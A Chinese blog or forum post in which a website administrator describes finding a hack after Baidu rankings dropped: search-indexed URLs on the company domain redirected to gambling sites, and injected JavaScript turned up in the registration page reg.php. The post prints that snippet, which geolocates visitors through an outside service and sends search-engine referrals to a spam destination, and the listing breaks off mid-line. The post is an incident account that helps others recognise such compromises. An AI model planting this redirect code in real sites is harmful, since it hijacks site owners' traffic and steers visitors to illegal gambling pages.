|
最近公司网站莫名的访问量减少,网站在百度搜索里排名也都下滑到第二页去了,也不知道怎么回事搞得最近很烦,领导也找我谈话,问网站怎么管理维护的,一直稳定了好几年的网站排名,怎么最近都跌倒后头去了,我说可能最近百度做调整吧,很快排名会上来的,本来也没有太在意,因为之前遇到过百度抽风的这些情况。
最近也加上客户订单越来越少,领导也是着急,很大一部分客户渠道来源都从百度点击来的,静下心来看看网站到底是怎么回事,不看不要紧,简直吓我一跳。网站在百度里的收录增加许多,本来以为是更新的文章导致的,可是仔细一想也没那么多的收录呀,site:网站,点击到十页以后竟然发现了问题的关键,百度收录了一大堆我们网站没有的URL链接,复制那个我们域名的链接,提示不存在,从百度收录点进去跳转到博彩网站。
360提示:未经证实的网站
您访问的网站含有未经证实的境外博彩或非法赌博的相关内容,可能给您造成财产损失,请您谨慎访问。
我这才明白过来,原来是我网站被黑了。
赶紧连网站的FTP,下载网站程序代码到本地,然后挨个对每一个代码进行查看,查看是不是网站被黑客植入了木马后门,果不其然在会员系统里的注册页面reg.php发现了黑客插入的恶意代码:
- document.write ('');
- var jump_head = document.getElementsByTagName('head')[0];
- var jump_script= document.createElement('script');
- jump_script.type= 'text/javascript';
- jump_script.src= 'http://int.dpool.sina.com.cn/iplookup/iplookup.php?
- format=js';
- jump_head.appendChild(jump_script);
- var jump_myt = setInterval(function(){
- if (remote_ip_info) {
- clearInterval(jump_myt);
- if (remote_ip_info.city == '\u798f\u5efa' ||
- remote_ip_info.province == '\u798f\u5efa') {
- }else{
- go_bots_url();
- }
- },500);
- function go_bots_url(){
- var init_flag = "93989",
- bct = document.referrer,
- bot = ['baidu', 'google', 'yahoo', 'bing', 'soso', 'sogou',
- '360.cn', 'so.com', 'youdao', 'anquan','sm.cn'];//, 'haosou'];
- for (var i in bot) {
- if (bct.indexOf(bot[i]) != -1) {
- init_flag = "1245";
- document.writeln("
复制代码
|
|